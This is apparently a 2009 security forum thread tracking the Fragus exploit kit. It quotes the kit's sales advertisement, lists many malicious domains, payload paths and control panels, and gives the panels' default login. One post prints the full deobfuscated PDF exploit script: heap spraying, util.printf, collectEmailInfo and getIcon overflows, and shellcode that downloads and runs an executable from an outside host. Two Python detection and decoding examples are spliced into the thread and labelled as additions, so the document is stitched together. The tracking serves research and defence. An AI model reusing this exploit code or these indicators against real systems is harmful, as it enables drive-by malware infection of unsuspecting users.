Malware Domain List
Malware Related => Malicious Domains => Topic started by: SysAdMini on August 25, 2009, 08:56:53 pm
-
Found at http://vx.eof-project.net/viewtopic.php?pid=1706
Administrator Toolbar:
- Attractive design
- Multilingual interface (Russian, English)
- Administrator Toolbar is protected by a password
- Advanced statistics for browsers (including versions), operating systems, countries, exploits
- Possibility to check urgent summary data without page reloading
- Files are uploaded from the Administrator Toolbar
- Possibility to specify the name of the file with which your EXE will be uploaded into the system
- Possibility to distinguish traffic between Sellers and to keep Seller-by-Seller independent statistics
- Possibility to indicate his own file for each Seller or to upload a random one
- Possibility for each Seller to indicate his own kit from the Exploit List, and also for total traffic, which makes it possible to shut down exploits inhibiting the browser, for resources where you can't be found
- Possibility to give Seller a unique link on a separate page with statistics for data verification without authorization
- Possibility both to clean general statistics and for each Seller separately
- Fragus enables you to watch over the feedback of each exploit and to display it in an easy-to-use way; possibility of feedback on a URL that has many EXEs
- Also Fragus permits you to quickly find the link for traffic, in either open or encoded (encoded iframe) form, for total traffic and for each Seller separately
- All preferences are available right from Administrator Toolbar
System features:
- High-quality exploit imaging, with the possibility of checking via ajax whether the current exploit infects or not before loading the next one. This option can be disabled in the Administrator Toolbar
- Possibility to edit the host on the necessary URL after it is done allows you not to lose used traffic, and to utilize it pro domo sua. Also you can edit on a separate URL those who visit the exploits pack twice or more
- Complete modularity of exploits in the system. Your coder will be able to add them easily
- Zero-written cryptor of exploits doesn't overload the browser, but nevertheless protects the exploits pack safely from antiviruses
- The cryptor lies in a separate file and if you want you can easily add your own cryptor
- Patterns of pages for exploits imaging, with the page for those who visit twice, lie separately, disguised as a 404 error. And it won't be very difficult for you to edit them so they suit your own ends
- Patterns of the Administrator Toolbar also lie separately, so those who don't like our design can change it easily
- Fragus hides from searchbots, which disables domain detection
- Fragus is highly optimized for operating with massive traffic flows and minimum load on server
- Installation will take less than 2 minutes. You don't have to get into files or edit something manually. The installation wizard will help you
Exploits:
- Mdac, still infects IE6 well enough
- PDF: printf(), collectEmailInfo(), getIcon(). Exploit images only for those who 100% have a vulnerable version of Adobe Acrobat. It is arranged so that it can infect absolutely all browsers where this plugin is installed
- MS DirectShow, large break increment
- MS09-002 - for IE7
- MS Spreadsheet, rather new exploit
- AOL IWinAmp, infects rather nicely, almost like PDF
- MS Snapshot with instantaneous run
- MS COM finishes IE6 off, if it doesn't break
Price:
800 USD
Exploits pack is sold with closed source code (IonCube)
Hiding of pack functioning from antiviruses (per Customer) - 30 USD
Zero-written cryptor (per Customer) - 150 USD
Large updates are paid
samples :
First you have to visit show.php. Otherwise you will receive only a 404 for the exploits and payload
exploits
fragtopmassage.ru/frag/show.php
flash exploit
fragtopmassage.ru/frag/swf.swf
pdf exploit
fragtopmassage.ru/frag/pdf.pdf
payload
fragtopmassage.ru/frag/load.php?e=3
control panel
fragtopmassage.ru/frag/admin.php
exploits
blt.kz/1/show.php
flash exploit
blt.kz/1/swf.swf
pdf exploit
blt.kz/1/pdf.pdf
payload
blt.kz/1/load.php?e=3
control panel
blt.kz/1/admin.php
Article from EvilFingers
http://evilfingers.blogspot.com/2009/08/fragus-new-botnet-framework-in-wild.html
-
http://blog.purewire.com/bid/19509/The-Fragus-Exploit-Kit
-
Fragus – crimeware in the wild
http://securitybananas.com/?p=134
-
New, seen 2009-09-01; not Google Blacklisted/etc:
tour6.info/tomer/show.php?s=2f2d557669
-
I came across 2 Fragus kits with almost undetected payloads.
Remember that you have to download show.php first.
cloudsregion.info/maner/show.php
cloudsregion.info/maner/load.php?e=2
http://www.virustotal.com/analisis/7ce9571bb83c2d13655b50e0fad2a98f69928e0d79202fa13f51e6e4eab1c1f8-1252397303 1/41
addvertseense.co.uk/show.php
addvertseense.co.uk/load.php?e=2
http://www.virustotal.com/analisis/26ad34c5afc858ef210493c530214b2162347bccf8e197f37e8b4c73da8900a3-1252397512 3/41
http://www.threatexpert.com/report.aspx?md5=85050c8c96a3d35b1ce981f7632c15b9
downloads
zstudio1.cn/v3/system/msvcr80.dll
http://www.virustotal.com/analisis/02bdde38e4c6bd795a092d496b8d6060cdbe71e22ef4d7a204e3050c1be44fa9-1252399791 0/41
-
geroyvoin.cn/1/show.php?s=747bbfed51
geroyvoin.cn/1/cosx.ipg
geroyvoin.cn/1/manual.swf
geroyvoin.cn/1/cegmoprwx.pdf
geroyvoin.cn/1/jpy5.exe
geroyvoin.cn/1/bgmnrsyz3.exe
geroyvoin.cn/1/dprtz3.exe
geroyvoin.cn/1/dfpquz3.exe
geroyvoin.cn/1/degjt3.exe
geroyvoin.cn/1/bdflu3.exe
geroyvoin.cn/1/dfwx3.exe
geroyvoin.cn/1/admin.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=c0111429a935628b86fb7be697fc2838&t=1252531195&type=js)
VirusTotal (http://www.virustotal.com/analisis/112946f35cf76ed853b44aeaf837cc5c9ad15722e46637e3af1f82b4b122f41b-1252531260) - 4/41 (9.76%)
-
213.163.84.28
sockslab.net/2/admin.php
-
dmitrygaiduk.cn/show.php?s=1893da9ce4
dmitrygaiduk.cn/dgn.ipg
dmitrygaiduk.cn/adhlorvy.pdf
dmitrygaiduk.cn/bcluwy5.exe
dmitrygaiduk.cn/bgjmpqy2.exe
dmitrygaiduk.cn/cfku3.exe
dmitrygaiduk.cn/cjkosuwxy3.exe
dmitrygaiduk.cn/dfhjnwx3.exe
dmitrygaiduk.cn/dkmps3.exe
dmitrygaiduk.cn/hosuvwxz3.exe
dmitrygaiduk.cn/ilmry3.exe
dmitrygaiduk.cn/admin.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=7049447b1560e567bb3965572ae17556&t=1252583315&type=js)
VirusTotal (http://www.virustotal.com/analisis/06d12345e3379d6328e0bf0437ff73dd5369f99945b841d23927ee1a93897fb0-1252574565) - 2/41 (4.88%)
McAfee-GW-Edition: Heuristic.LooksLike.Win32.Suspicious.H!87
Panda: Suspicious file
-
Fragus has been modified. It doesn't use static filenames for pdf exploits and payloads any longer.
Payloads are only downloadable for limited amount of time (some minutes).
All Fragus kits which we have seen before have used pdf.pdf for the pdf file, swf.swf for the Flash and
load.php for the payload. Now the filenames for the pdf file and the payload change randomly and at each request.
The name of the Flash file seems to be always manual.swf.
For examples look at the last postings of this thread
or see this one here:
I have checked hxxp://git77.biz/peg/show.php?s=ccc648c6ef multiple times.
Here are 2 results.
http://wepawet.cs.ucsb.edu/view.php?hash=6223f79cf6f195fc5589e50f8544bbbc&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=a06d6231dfc563f09b4f2f4b4892605b&type=js
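As an added defender-side example (not code from the thread), the pass below groups constructed proxy log lines under the show.php?s=&lt;token&gt; landing page each client hit and tells the old static-filename chain (swf.swf, pdf.pdf, load.php) from the modified one (manual.swf plus randomised pdf/exe names); the log format, hostnames and filenames are assumptions made for the sample.

```python
"""Spot Fragus-style landing-page sessions in proxy logs (defender's example)."""
import re

# Constructed proxy log lines (not real traffic): "<client> GET <url>" per line.
# Client .5 shows the old static names, client .7 the modified kit's randomised
# names; client .9 is unrelated noise with a similar-looking path.
SAMPLE_LOG = """\
10.0.0.5 GET http://kit-old.example/fr2/show.php?s=0123456789
10.0.0.5 GET http://kit-old.example/fr2/swf.swf
10.0.0.5 GET http://kit-old.example/fr2/pdf.pdf
10.0.0.5 GET http://kit-old.example/fr2/load.php?e=3
10.0.0.7 GET http://kit-new.example/peg/show.php?s=abcdef0123
10.0.0.7 GET http://kit-new.example/peg/manual.swf
10.0.0.7 GET http://kit-new.example/peg/xkqzv.pdf
10.0.0.7 GET http://kit-new.example/peg/bdflu3.exe
10.0.0.9 GET http://news.example/show.php?s=front
10.0.0.9 GET http://news.example/manual.pdf
"""

LINE_RE = re.compile(r"^(\S+)\s+GET\s+(\S+)$")
# show.php?s=<10 hex chars> is the landing-page shape repeated across the thread.
LANDING_RE = re.compile(
    r"^(?P<base>https?://[^/]+(?:/[^/?]+)*)/show\.php\?s=(?P<token>[0-9a-f]{10})$"
)
OLD_STATIC_NAMES = {"swf.swf", "pdf.pdf"}  # plus load.php?e=N for the payload
NEW_FLASH_NAME = "manual.swf"  # the one name the modified kit kept static


def parse_log(log):
    """Yield (client, url) pairs from the constructed log format."""
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), m.group(2)


def find_fragus_sessions(log):
    """Group each client's requests under its show.php landing URL and classify them."""
    sessions = {}  # (client, kit base URL) -> {"token", "files"}
    for client, url in parse_log(log):
        m = LANDING_RE.match(url)
        if m:
            sessions[(client, m.group("base"))] = {"token": m.group("token"), "files": []}
            continue
        # Anything the same client fetches below a landing page's base path belongs
        # to that session (the payload is only served for minutes, so time windows
        # would be the next refinement).
        for (c, base), sess in sessions.items():
            if c == client and url.startswith(base + "/"):
                sess["files"].append(url[len(base) + 1:])
    findings = []
    for (client, base), sess in sessions.items():
        names = sess["files"]
        has_flash = any(n in (NEW_FLASH_NAME, "swf.swf") for n in names)
        has_pdf = any(n.endswith(".pdf") for n in names)
        has_payload = any(n.endswith(".exe") or n.startswith("load.php?e=") for n in names)
        if not (has_flash and has_pdf and has_payload):
            continue  # the landing page alone is not the full chain
        fmt = "old" if OLD_STATIC_NAMES & set(names) else "new"
        findings.append({"client": client, "base": base, "token": sess["token"], "format": fmt})
    return findings


if __name__ == "__main__":
    for finding in find_fragus_sessions(SAMPLE_LOG):
        print(finding)
```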
-
can't find the correct path to these domains - seems to be related
gat77.biz
bot77.biz
http://www.bfk.de/bfk_dnslogger.html?query=91.212.198.3
http://www.malwaredomainlist.com/mdl.php?search=91.212.198.3&colsearch=All&quantity=50&inactive=on
-
Haven't found the path, but one of our readers at Twitter sent me message that all 77.biz domains use the new version.
I guess those 2 domains are related.
-
old format
bobunium.com/fr2/show.php?s=f801ff8253
new format
americaregion.info/born/show.php?s=dd6d6bb56c
busergondermags.com/f2hubba/show.php?s=019c9537bc
fartunaall.ru/task/show.php?s=e7e53d546c
-
got77.biz/peg/show.php?s=75dbfbfc1f
got77.biz/peg/chlnquxyz.pdf
got77.biz/peg/aeimnstxz3.exe
got77.biz/peg/chknz3.exe
got77.biz/peg/egijkmtx3.exe
got77.biz/peg/gjklmnrsy5.exe
got77.biz/peg/hwx3.exe
got77.biz/peg/inz3.exe
got77.biz/peg/mnqv2.exe
got77.biz/peg/optwx3.exe
got77.biz/peg/admin.php (control panel)
Wepawet (http://wepawet.iseclab.org/view.php?hash=d06bd282bdb11609fae8640705f9f587&t=1252743523&type=js)
-
Malware-Web-Threats
PDF file filter in first section: ASCII85Decode, FlateDecode
Second section: FlateDecode
for (var amnsx=0, fioqtu='';amnsx<5298;amnsx++){fioqtu += String.fromCharCode(fra[amnsx]-'gIVcZfd'.substring(amnsx%'gIVcZfd'.length,amnsx%'gIVcZfd'.length+1).charCodeAt(0));}eval(fioqtu);
output variant:
function fix_it(yarsp, len)
{
while (yarsp.length * 2 < len) {
yarsp += yarsp;
}
yarsp = yarsp.substring(0, len / 2);
return yarsp;
}
function util_printf()
{
var payload = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u642F%u706D%u7472%u3377%u652E%u6578%u0000");
var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock = nop + payload;
var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray) {
bigblock += bigblock;
}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 0x40000) {
block = block + block + fillblock;
}
var mem_array = new Array();
for (var i = 0; i < 1400; i++) {
mem_array[i] = block + heapblock;
}
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f", num);
}
function collab_email()
{
var shellcode = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u622F%u6963%u716F%u7A78%u2E33%u7865%u0065");
var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len + 0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000) / addr;
for (var count = 0; count < count2; count++) {
mem_array[count] = yarsp + shellcode;
}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952) {
overflow += overflow;
}
this.collabStore = Collab.collectEmailInfo({
subj : "", msg : overflow
});
}
function collab_geticon()
{
if (app.doc.Collab.getIcon)
{
var arry = new Array();
var vvpethya = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u642F%u6A67%u6E6C%u3373%u652E%u6578%u0000");
var hWq500CN = vvpethya.length * 2;
var len = 0x400000 - (hWq500CN + 0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y++) {
arry[vqcQD96y] = yarsp + vvpethya;
}
var tUMhNbGw = unescape("%09");
while (tUMhNbGw.length < 0x4000) {
tUMhNbGw += tUMhNbGw;
}
tUMhNbGw = "N." + tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}
function pdf_start()
{
var version = app.viewerVersion.toString();
version = version.replace(/\D/g, '');
var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)) {
util_printf();
}
if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)) {
collab_email();
}
if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)) {
collab_geticon();
}
}
pdf_start();
shellcode download & execute file hxxp://got77.biz/peg/dmprtw3.exe
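The loader shown above (the `fra` array plus the `String.fromCharCode(fra[i] - key[i % key.length])` loop) is a plain rolling-key subtraction, which is why the `eval` can be replaced by a static decode during analysis. The script below is an added example for analysts, not code from the Fragus kit or from this thread: it pulls the array and key string out of a loader of that shape, reverses the subtraction without executing anything, and flags the Acrobat JavaScript API names the decoded script references (`util.printf`, `Collab.collectEmailInfo`, `Collab.getIcon`, `app.viewerVersion`), along with long `%uXXXX` blobs. The key string `gIVcZfd` is the one visible in the loader; the sample array, its decoded text and all function names are constructed for this example and are not the real payload.

```python
"""Static decoder and triage for charcode-array obfuscated PDF JavaScript.

Added example for defenders; not code from the Fragus kit or the thread.
Decode mirrors the loader's loop: out[i] = chr(codes[i] - ord(key[i % len(key)])).
"""
import re

# API names the dumped exploit depends on; an analyst would flag any decoded
# PDF script that references them (names taken from the code on the page).
SUSPICIOUS_APIS = (
    "util.printf",
    "Collab.collectEmailInfo",
    "Collab.getIcon",
    "app.viewerVersion",
)


def decode_charcode_array(codes, key):
    """Reverse the obfuscation statically (no eval): subtract the cyclic key."""
    if not key:
        raise ValueError("key must be non-empty")
    out = []
    for i, c in enumerate(codes):
        ch = c - ord(key[i % len(key)])
        if not 0 <= ch <= 0xFFFF:
            raise ValueError(f"element {i} decodes out of range: {ch}")
        out.append(chr(ch))
    return "".join(out)


def encode_charcode_array(text, key):
    """Inverse of decode; used only to build the constructed sample below."""
    return [ord(ch) + ord(key[i % len(key)]) for i, ch in enumerate(text)]


def extract_loader(js_source):
    """Locate the numeric array literal and the key in a loader of the shape
    "var X=[..]; ... fromCharCode(X[i]-'KEY'.substring(...)". Returns None if
    the source does not look like that loader."""
    m_arr = re.search(r"\[\s*((?:\d+\s*,\s*)*\d+)\s*\]", js_source)
    m_key = re.search(r"fromCharCode\(\w+\[\w+\]-'([^']+)'", js_source)
    if not m_arr or not m_key:
        return None
    codes = [int(x) for x in m_arr.group(1).split(",")]
    return codes, m_key.group(1)


def triage(decoded):
    """Return the suspicious API names present and whether the text carries a
    run of %uXXXX escapes (the unescape() form used for shellcode/spray)."""
    hits = [api for api in SUSPICIOUS_APIS if api in decoded]
    blob = re.search(r"(%u[0-9A-Fa-f]{4}){8,}", decoded) is not None
    return hits, blob


def analyse(js_source):
    """Full pass: extract, decode, triage. None when no loader is found."""
    parsed = extract_loader(js_source)
    if parsed is None:
        return None
    codes, key = parsed
    decoded = decode_charcode_array(codes, key)
    hits, blob = triage(decoded)
    return {"key": key, "decoded": decoded, "apis": hits, "unicode_blob": blob}


# Constructed sample (NOT the real payload): a short script of the same shape,
# encoded with the key string seen in the loader on the page.
KEY = "gIVcZfd"
SAMPLE_PLAINTEXT = (
    'var s=unescape("' + "%u9090" * 8 + '");util.printf("%45000f",1);'
)
SAMPLE_CODES = encode_charcode_array(SAMPLE_PLAINTEXT, KEY)
SAMPLE_LOADER = (
    "var fra=[" + ",".join(str(c) for c in SAMPLE_CODES) + "];\n"
    "for (var i=0, o='';i<" + str(len(SAMPLE_CODES)) + ";i++){"
    "o += String.fromCharCode(fra[i]-'" + KEY + "'.substring(i%'" + KEY
    + "'.length,i%'" + KEY + "'.length+1).charCodeAt(0));}eval(o);"
)

if __name__ == "__main__":
    print(analyse(SAMPLE_LOADER))
```

To apply this to a real sample, feed `analyse()` the JavaScript stream extracted from the PDF object (after FlateDecode); a non-`None` result with any entry in `apis` or `unicode_blob` set is enough to escalate the file for a sandbox run rather than trust the low detection counts quoted later in this thread.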
-
Malware-Web-Threats )
shellcode download & execute file hxxp://got77.biz/peg/dmprtw3.exe
As mentioned earlier in this thread, file names change at each run. So what Anthony has posted is not wrong.
-
user:
admin
password:
adminadmin
-
gat77.biz/peg/show.php?s=75dbfbfc1f
gat77.biz/iloprsvxy.ipg
gat77.biz/dost.pdf
gat77.biz/manual.swf
gat77.biz/peg/aeq2.exe
gat77.biz/peg/bghprwz5.exe
gat77.biz/peg/admin.php (control panel)
Wepawet (http://wepawet.iseclab.org/view.php?hash=f81b97a95263a0bfcde4cca31baa5a88&t=1252875860&type=js)
VirusTotal (http://www.virustotal.com/analisis/4471c9636b7807a1bb7cf1e93770f74b1167b31aed01d7a9e60de8800e8daaae-1252875866) - 3/41 (7.32%)
-
Exploits:
fot77.biz/peg/show.php?s=ccc648c6ef
fot77.biz/peg/ckz.pdf
fot77.biz/peg/manual.swf
Trojan:
fot77.biz/peg/abdehinw3.exe
fot77.biz/peg/aklpqty2.exe
fot77.biz/peg/bcginru3.exe
fot77.biz/peg/ehity3.exe
fot77.biz/peg/ehlpquvyz3.exe
fot77.biz/peg/hiuvz5.exe
fot77.biz/peg/kmsw3.exe
fot77.biz/peg/luxy3.exe
Control Panel:
fot77.biz/peg/admin.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=7b2f51336a2740578248b694b3307464&t=1252920606&type=js)
VirusTotal (http://www.virustotal.com/analisis/a639ed588082ec996ac260ed9fffbec4b0deb14ffe619133368fbd2fa6cb10b7-1252920624) - 2/41 (4.88%)
File size: 32768 bytes
MD5: 051ae824e14a68e0c8c77c18ebd6d557
McAfee-GW-Edition: Heuristic.LooksLike.Worm.Bezopi.B
Rising: Unknown Win32 Virus
-
Few Fragus exploit kit links:
kilogid2.biz/pol/admin.php
kilogid2.biz/pol/show.php
kilogid2.biz/pol/manual.swf
kilogid2.biz/pol/pdf.pdf
kilogid2.biz/pol/load.php?e=2
ledyzpizdik.cn/admin.php
ledyzpizdik.cn/show.php
ledyzpizdik.cn/manual.swf
ledyzpizdik.cn/pdf.pdf
ledyzpizdik.cn/load.php?e=2
domain25.net/index/admin.php
domain25.net/index/show.php
domain25.net/index/manual.swf
domain25.net/index/pdf.pdf
domain25.net/index/load.php?e=2
-
Exploits
fit77.biz/peg/show.php?s=75dbfbfc1f
fit77.biz/peg/show.php?s=ccc648c6ef
fit77.biz/peg/manual.swf
Trojan
fit77.biz/peg/bcemqrv3.exe
fit77.biz/peg/cdnw3.exe
fit77.biz/peg/clpvx3.exe
fit77.biz/peg/degoqrz5.exe
fit77.biz/peg/efginopy2.exe
fit77.biz/peg/eikmnpuv3.exe
fit77.biz/peg/gilo3.exe
fit77.biz/peg/hiks3.exe
Control Panel:
fit77.biz/peg/admin.php
Wepawet (http://wepawet.iseclab.org/view.php?type=js&hash=02002192a60d511d8e6660eff534062c&t=1252949734)
VirusTotal (http://www.virustotal.com/analisis/5199ea7b98c94b33c4cbf0b211b577e8863b14525958548e50823f8d9dee4f09-1252949857) - 4/41 (9.76%)
a-squared: Worm.Win32.Bezopi!IK
Ikarus: Worm.Win32.Bezopi
Microsoft: VirTool:Win32/Obfuscator.GP
Rising: Unknown Win32 Virus
-
justpaythis.cn/frag/news.php?s=3b7e95ce5d
justpaythis.cn/frag/manual.swf
justpaythis.cn/frag/ipsz.pdf
justpaythis.cn/frag/sdfg.jar
justpaythis.cn/frag/click.php?r=
justpaythis.cn/frag/afhnwy2.exe
justpaythis.cn/frag/bimnuz2.exe
justpaythis.cn/frag/binwx2.exe
justpaythis.cn/frag/dhjku2.exe
justpaythis.cn/frag/efksvw7.exe
justpaythis.cn/frag/ejkx2.exe
justpaythis.cn/frag/nqtx2.exe
justpaythis.cn/frag/sdgsg5.exe
http://wepawet.iseclab.org/view.php?hash=4ae087e346a324548d108e4e5e9594d3&t=1255079289&type=js
-
Fragus:
soft-bumbum.biz/cat/news.php?s=24e79fe4f2
http://wepawet.iseclab.org/view.php?hash=f7e140053ef8f27aaa8cf876a2406bdb&t=1255387491&type=js
PDF:
soft-bumbum.biz/cat/ijlpuy.pdf
soft-bumbum.biz/cat/gnpsz.pdf
Flash:
soft-bumbum.biz/cat/manual.swf
java exploit?:
soft-bumbum.biz/cat/sdfg.jar
http://www.virustotal.com/analisis/eb4f3bd460824c701f3a99463a16e4307f5a4c111f1dc610d26db82d6436f842-1255387420
also redirects to:
yoriksli.net?uid=176&pid=3&ttl=9194f502492
which redirects to fake AV at:
scan-localzone.com/?p=WKmimHVlb2%2BHjsbIo22EhHV8ipnVbWeMnNah2qeMoIHT0NqnWJaimHWWl3%2BnU9janW1mZWtsymKSYmSfX4nX15Krp6mih9esb2VraW1ncHCUY5SMlJNq
-
blogkz.cn/news.php?s=326356cda1
blogkz.cn/dhmy.pdf
blogkz.cn/manual.swf
blogkz.cn/sdfg.jar
blogkz.cn/dshdsgfh4.exe
blogkz.cn/aekoz2.exe
blogkz.cn/bglm2.exe
blogkz.cn/cfhjz2.exe
blogkz.cn/dfnpw2.exe
blogkz.cn/dghkr7.exe
blogkz.cn/djtu2.exe
blogkz.cn/fpsy2.exe
blogkz.cn/sdgsg5.exe
blogkz.cn/file.exe
privetmedved.cn/news.php?s=326356cda1
privetmedved.cn/click.php?r=
privetmedved.cn/aeikvw2.exe
privetmedved.cn/asuxy2.exe
privetmedved.cn/bgkou2.exe
privetmedved.cn/bgnou7.exe
privetmedved.cn/celtvw2.exe
privetmedved.cn/efjmq2.exe
privetmedved.cn/gjmz2.exe
privetmedved.cn/sdgsg5.exe
privetmedved.cn/file.exe
fromads.com/in.cgi?10
goople.biz/adv.js/news.php?s=827ac7d108
goople.biz/adv.js/bcelpu.pdf
goople.biz/adv.js/manual.swf
goople.biz/adv.js/sdfg.jar
goople.biz/adv.js/dshdsgfh4.exe
goople.biz/adv.js/amortv2.exe
goople.biz/adv.js/anqrt2.exe
goople.biz/adv.js/aopsy2.exe
goople.biz/adv.js/dghk7.exe
goople.biz/adv.js/dknuv2.exe
goople.biz/adv.js/ikpy2.exe
goople.biz/adv.js/izrd2.exe
goople.biz/adv.js/sdgsg5.exe
goople.biz/adv.js/file.exe
http://wepawet.iseclab.org/view.php?hash=a52840a5c5718667a0fcbe59a547224a&t=1255441903&type=js
-
qweasdd.net/fragus/pdf.php
qweasdd.net/fragus/load.php
qweasdd.net/fragus/admin.php